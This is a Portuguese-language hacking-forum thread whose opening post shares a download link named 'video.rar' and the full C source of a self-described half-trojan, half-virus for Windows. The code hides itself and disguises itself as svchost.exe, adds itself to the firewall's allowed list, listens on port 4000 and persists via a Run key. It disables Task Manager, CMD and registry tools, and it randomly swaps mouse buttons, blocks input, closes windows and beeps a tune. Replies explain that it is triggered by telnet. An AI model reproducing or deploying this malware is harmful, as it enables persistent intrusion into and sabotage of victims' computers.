Print Page - meio trojan, meio virus

Title: meio trojan, meio virus
Post by: Anonymous on 21 de November , 2006, 11:36:08 PM
http://www.vnsbr.xpg.com.br/video.rar (http://www.vnsbr.xpg.com.br/video.rar)

uma breve explicação
código:
#include <windows.h>
#include <winsock.h>
#include <winable.h>
#include <stdio.h>
#define PORTA 4000


// Mario theme tune converted by metelhead, bloody good job metelhead, its funny as fuck

void AntiFirewall(char* display_name)
{

    char path[MAX_PATH];
    HMODULE ModH = GetModuleHandle(NULL);
    GetModuleFileName(ModH, path, sizeof(path));
    char data[MAX_PATH] = "";
    strcpy (data, path);
    strcat (data, ":*:Enabled:");
    strcat (data, display_name);

    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, KEY_SET_VALUE, &hKey);
    RegSetValueEx(hKey, path,0,REG_SZ,(const unsigned char*)data,sizeof(data));
    RegCloseKey(hKey);
}

void mariobitch(){
    Beep((DWORD)(DWORD) 1480,(DWORD)(DWORD)200);

    Beep((DWORD)1568,(DWORD)200);

    Beep((DWORD)1568,(DWORD)200);

    Beep((DWORD)1568,(DWORD)200);



    Beep((DWORD)(DWORD) 739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);



    Beep((DWORD)369.99,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)369.99,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)392,(DWORD)400);

    Beep((DWORD)196,(DWORD)400);



    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)830.61,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)987.77,(DWORD)400);


    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)830.61,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)987.77,(DWORD)400);

      Sleep(200);

    Beep((DWORD)1108,(DWORD)10);
    Beep((DWORD)1174.7,(DWORD)200);
    Beep((DWORD)1480,(DWORD)10);
    Beep((DWORD)1568,(DWORD)200);


    Sleep(200);
    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)830.61,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)987.77,(DWORD)400);


    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);


    Beep((DWORD)659.25,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)784,(DWORD)200);

    Beep((DWORD)880,(DWORD)400);

    Beep((DWORD)784,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)659.25,(DWORD)200);



    Beep((DWORD)587.33,(DWORD)200);

    Beep((DWORD)659.25,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)784,(DWORD)400);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)659.25,(DWORD)200);

    Beep((DWORD)587.33,(DWORD)200);



    Beep((DWORD)523.25,(DWORD)200);

    Beep((DWORD)587.33,(DWORD)200);

    Beep((DWORD)659.25,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)400);

    Beep((DWORD)659.25,(DWORD)200);

    Beep((DWORD)587.33,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)523.25,(DWORD)200);


    Sleep(400);
    Beep((DWORD)349.23,(DWORD)400);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)329.63,(DWORD)200);

    Beep((DWORD)523.25,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)466.16,(DWORD)200);



    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)523.25,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)1760,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);



    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)1568,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);



    Beep((DWORD)349.23,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)415.2,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)1396.92,(DWORD)200);

    Beep((DWORD)349.23,(DWORD)200);



    Beep((DWORD)329.63,(DWORD)200);

    Beep((DWORD)311.13,(DWORD)200);

    Beep((DWORD)329.63,(DWORD)200);

    Beep((DWORD)659.25,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)400);

    Beep((DWORD)783.99,(DWORD)400);



    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)523.25,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)880,(DWORD)200);

    Beep((DWORD)1760,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);



    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)493.88,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)1568,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);



    Beep((DWORD)349.23,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)440,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)659.25,(DWORD)200);

    Beep((DWORD)698.46,(DWORD)200);

    Beep((DWORD)739.99,(DWORD)200);

    Beep((DWORD)783.99,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)392,(DWORD)200);

    Beep((DWORD)196,(DWORD)200);

    Beep((DWORD)196,(DWORD)200);

    Beep((DWORD)196,(DWORD)200);



    Beep((DWORD)185,(DWORD)200);

    Beep((DWORD)196,(DWORD)200);

    Beep((DWORD)185,(DWORD)200);

    Beep((DWORD)196,(DWORD)200);

    Beep((DWORD)207.65,(DWORD)200);

    Beep((DWORD)220,(DWORD)200);

    Beep((DWORD)233.08,(DWORD)200);

    Beep((DWORD)246.94,(DWORD)200);
}

void inffect(){

    char *buffer;
    char inffected[MAX_PATH];
    system("net view >> c:\\a.txt");
    FILE *fp;
    fp=fopen("c:\\a.txt","r");
    long size;
    int i=0,i2=0;
    char path[MAX_PATH];
    HMODULE ModH = GetModuleHandle(NULL);
    GetModuleFileName(ModH, path, sizeof(path));

    fseek (fp , 0 , SEEK_END);
    size = ftell (fp);
    rewind (fp);
    buffer = (char*) malloc (size);

    fread (buffer,1,size,fp);
    fclose(fp);
    remove("c:\\a.txt");

    for (int i=0;i<strlen(buffer);i++){
        if (buffer[i]=='\\') buffer[i]='#';
        if (buffer[i]==' ') buffer[i]='#';
    }

    char *computers[20];
    char *valor=strtok(buffer,"#");

    while(valor!=NULL){
        computers[i]=valor;
        valor = strtok(NULL,"#");
        i++;
    }
    for (i2=2;i2<=(i-5);i2+=3){
        sprintf(inffected,"\\\\%s%s",computers[i],"C");
        strcpy(computers[i],path);
    }
}

int main(){
   
ShowWindow(GetForegroundWindow(),0);

AntiFirewall("svchost.exe");

WSADATA data;
SOCKET winsock;
struct sockaddr_in sock;

if(WSAStartup(MAKEWORD(1,1),&data)==-1)
return 1; //Tenta inicializar o winsock


if((winsock = socket(AF_INET,SOCK_STREAM,0))==-1)
return 1; //Tenta criar o socket


sock.sin_family=AF_INET;
sock.sin_addr.s_addr = INADDR_ANY;
sock.sin_port=htons(PORTA);
if((bind(winsock,(struct sockaddr*)&sock,sizeof(sock))) ==-1){
return 0;
}
listen(winsock,1);
while((winsock = accept(winsock,0,0))==SOCKET_ERROR)
{
Sleep(1);
}

    srand(5);
    POINT pt;
    HKEY hkey;
    int BUF;
    DWORD dwBufLen = BUF;
    RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
    RegSetValueEx(hkey,"svchost",0,REG_SZ,(BYTE *)"F:\\WINXP\\svchost.exe",strlen("F:\\WINXP\\svchost.exe"));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "DisableTaskmgr", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "NoFind", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "NoClose", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "NoControlPanel", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "NoLogoff", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "NoRun", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "DisableRegistryTools", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
    RegSetValueEx (hkey, "DisableCMD", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
    
    //inffect();

    while(1){
        Sleep(rand()%200);
        GetCursorPos(&pt);
        switch (rand()%10){
            case 0: SetCursorPos(pt.x+10,pt.y+10); break;
            case 1: SetCursorPos(pt.x,pt.y+10); break;
            case 2: SetCursorPos(pt.x+10,pt.y); break;
            case 3:
                switch (rand()%10){
                    case 0: PostMessage(HWND_BROADCAST, WM_CLOSE, 0, 0); break;
                    case 1: SwapMouseButton(true); break;
                    case 2: SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); break;
                    case 3: BlockInput(TRUE); break;
                    case 4: BlockInput(FALSE); break;
        		    case 5: mariobitch(); break;
                    default: break;
                }
            break;
            default: break;
        }

    }

}
Title: Re: meio trojan, meio virus
Post by: script on 11 de May , 2007, 10:19:06 PM
poxa cara,
mas, o q ele faz?
e pra q a música dos beeps?
Title: Re: meio trojan, meio virus
Post by: Anonymous on 13 de May , 2007, 10:15:11 AM
música dos beeps= payload, não é nocivo, é apenas para assustar o usuário

bom ele basicamente fica escutando na porta, qndo voce da um telnet no IP, ele começa a executar as funcoes dele

ai tem uma certa aleatoridade, tocar a musica, inverter os botôes do mouse, uns payloads meio toscos
Title: Re: meio trojan, meio virus
Post by: script on 13 de May , 2007, 12:52:13 PM
outros? quais outras músicas ele faz?
FORUM DARKERS

Tecnologia & Informática => Programação => C/C#/C++ => Topic started by: Anonymous on 21 de November , 2006, 11:36:08 PM
